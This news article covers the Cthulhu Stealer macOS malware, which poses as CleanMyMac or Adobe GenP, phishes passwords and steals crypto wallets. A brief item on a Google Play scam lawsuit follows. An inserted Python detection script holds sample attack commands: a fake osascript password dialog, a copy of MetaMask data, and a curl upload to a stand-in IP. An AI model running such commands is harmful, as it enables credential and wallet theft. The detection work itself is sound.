Apple Mac Users Beware: How to Protect Your Crypto Wallet from 'Cthulhu Stealer' Malware


Reinout te Brake | 26 Aug 2024 07:53 UTC

Mac Users Beware: Cthulhu Stealer Malware Targeting Crypto Wallets

Cybersecurity firm Cado Security recently warned Apple Mac users about a new malware strain called "Cthulhu Stealer." The malware is built to steal personal information and cryptocurrency wallet data, posing a significant risk to users.

The report from Cado Security emphasized the escalating threat landscape for macOS users, highlighting the need for heightened vigilance and security measures to counter such malicious software.

Cthulhu Stealer Masquerades as Legitimate Software

A notable characteristic of Cthulhu Stealer is that it poses as legitimate software, such as the popular applications CleanMyMac or Adobe GenP. The malware is distributed as an Apple disk image (DMG) that the victim is tricked into downloading and opening.

Once the user opens the downloaded file, the malware uses osascript, macOS's command-line tool for running AppleScript and JavaScript, to display a dialog asking for the user's system password. A second password prompt then appears, this one specifically targeting the MetaMask Ethereum wallet.

Notably, the malware also harvests data from other prominent cryptocurrency wallets, including Coinbase, Wasabi, Electrum, Atomic, Binance, and Blockchain Wallet.

Once running, Cthulhu Stealer writes the stolen data to text files, then profiles the victim's system by collecting details such as the IP address and operating system version. The collected data is then exfiltrated.
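The behaviour described above (a DMG-delivered app spawning osascript password dialogs, copying wallet data, then sending it out) is what a detection engineer would look for in process telemetry. The following is an added example written for this page, not code from Cado Security or from the malware itself. It runs a few simple rules over a constructed set of macOS process events; the event shape (pid, ppid, image path, argv) is assumed to be what an EDR or a unified-log query would provide, the MetaMask Chrome extension ID and the wallet directory names are assumptions to verify against your own fleet, and the sample events, including the 203.0.113.7 address, are constructed.

```python
import re

# Constructed macOS process-execution events (not real telemetry): an app
# launched from a mounted disk image spawns osascript password dialogs, copies
# a wallet extension's data and posts an archive to a raw IP address.
SAMPLE_EVENTS = [
    {"pid": 501, "ppid": 1, "image": "/bin/zsh", "argv": ["zsh", "-l"]},
    {"pid": 812, "ppid": 1,
     "image": "/Volumes/CleanMyMac/CleanMyMac.app/Contents/MacOS/CleanMyMac",
     "argv": ["/Volumes/CleanMyMac/CleanMyMac.app/Contents/MacOS/CleanMyMac"]},
    {"pid": 813, "ppid": 812, "image": "/usr/bin/osascript",
     "argv": ["osascript", "-e",
              'display dialog "macOS needs to access System Settings. '
              'Please enter your password." with title "System Preferences" '
              'default answer "" with icon caution with hidden answer']},
    {"pid": 814, "ppid": 812, "image": "/usr/bin/osascript",
     "argv": ["osascript", "-e",
              'display dialog "MetaMask: enter your wallet password" '
              'default answer "" with hidden answer']},
    {"pid": 815, "ppid": 812, "image": "/bin/sh",
     "argv": ["sh", "-c",
              "cp -R '/Users/alice/Library/Application Support/Google/Chrome/Default/"
              "Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn' /tmp/out/"]},
    {"pid": 816, "ppid": 812, "image": "/usr/bin/curl",
     "argv": ["curl", "-F", "file=@/tmp/out/data.zip", "http://203.0.113.7/upload"]},
    # Benign osascript use: a notification, no hidden-answer password field.
    {"pid": 900, "ppid": 1, "image": "/usr/bin/osascript",
     "argv": ["osascript", "-e",
              'display notification "Backup finished" with title "Time Machine"']},
]

# Wallet artefact locations to watch. Assumed values: the Chrome extension ID
# is MetaMask's; the other paths are common data directories for those wallets.
WALLET_PATH_PATTERNS = [
    r"Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn",  # MetaMask
    r"Application Support/Electrum",
    r"Application Support/atomic",
    r"\.walletwasabi",
]

# A transfer tool talking to a bare IPv4 address rather than a hostname.
RAW_IP_UPLOAD = re.compile(r"\b(curl|nc|wget)\b.*\b\d{1,3}(?:\.\d{1,3}){3}\b")


def is_password_dialog(cmd: str) -> bool:
    """AppleScript dialog with a masked text field: the lure Atomic Stealer and
    Cthulhu Stealer use to phish the login password and wallet passwords."""
    return "display dialog" in cmd and "hidden answer" in cmd


def detect(events) -> list:
    """Return (pid, rule, severity) findings. Severity is raised to 'high' when
    the parent process runs from a mounted disk image (/Volumes/...), which is
    how a DMG-delivered stealer first executes."""
    events = list(events)
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        cmd = " ".join(e["argv"])
        parent = by_pid.get(e["ppid"])
        from_dmg = parent is not None and parent["image"].startswith("/Volumes/")
        sev = "high" if from_dmg else "medium"
        if e["image"].endswith("/osascript") and is_password_dialog(cmd):
            findings.append((e["pid"], "osascript_password_prompt", sev))
        if any(re.search(p, cmd) for p in WALLET_PATH_PATTERNS):
            findings.append((e["pid"], "wallet_data_access", sev))
        if RAW_IP_UPLOAD.search(cmd):
            findings.append((e["pid"], "upload_to_raw_ip", sev))
    return findings


if __name__ == "__main__":
    for pid, rule, sev in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule} ({sev})")
```

The password-dialog rule on its own will also fire on legitimate admin scripts that ask for credentials, so the parent-from-/Volumes/ condition and the co-occurrence of wallet-path access in the same process tree are what turn a noisy signal into an alert worth paging on.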

Tara Gould, a researcher at Cado Security, noted that Cthulhu Stealer closely resembles Atomic Stealer, a malware strain identified in 2023 that also targets Apple devices, and suggested that the developer behind Cthulhu Stealer likely repurposed Atomic Stealer's code to build the new threat.

Furthermore, Cthulhu Stealer has been rented out to affiliates for a monthly fee of $500 through the Telegram messaging platform, with profits shared with the developers. Recent reports indicate that disputes over payments caused the main operators to vanish, prompting allegations of an exit scam.

In response to the rising prevalence of threats like Cthulhu Stealer, Apple has taken steps to harden macOS, with updates that tighten Gatekeeper, the mechanism that checks an application's code signature and notarization before allowing it to run, so that unsigned or un-notarized applications are harder to launch.

Florida Woman Takes Legal Action Against Google Over Play Store Crypto Scam

In a separate development, Maria Vaca, a resident of Florida, has initiated legal proceedings against Google, alleging that the tech giant’s negligence facilitated her loss of over $5 million. The lawsuit centers on Vaca being misled by a crypto investment app named Yobit Pro, obtained from the Google Play Store.

Google recently filed a lawsuit against two developers for publishing 87 deceitful apps that defrauded upwards of 100,000 users, including 8,700 Americans. Although the lawsuit did not mention Yobit Pro, the tactics it described echoed Vaca's experience with the fraudulent app.

These tactics typically involve enticing users with promises of substantial returns, followed by demands for additional payments under the pretense of taxes or fees, ultimately preventing users from withdrawing their funds.

Meanwhile, Google has introduced a feature enabling users to search for wallet balances across various blockchains including Bitcoin, Arbitrum, Avalanche, Optimism, Polygon, and Fantom. This move aims to give users greater visibility and transparency regarding their cryptocurrency holdings.
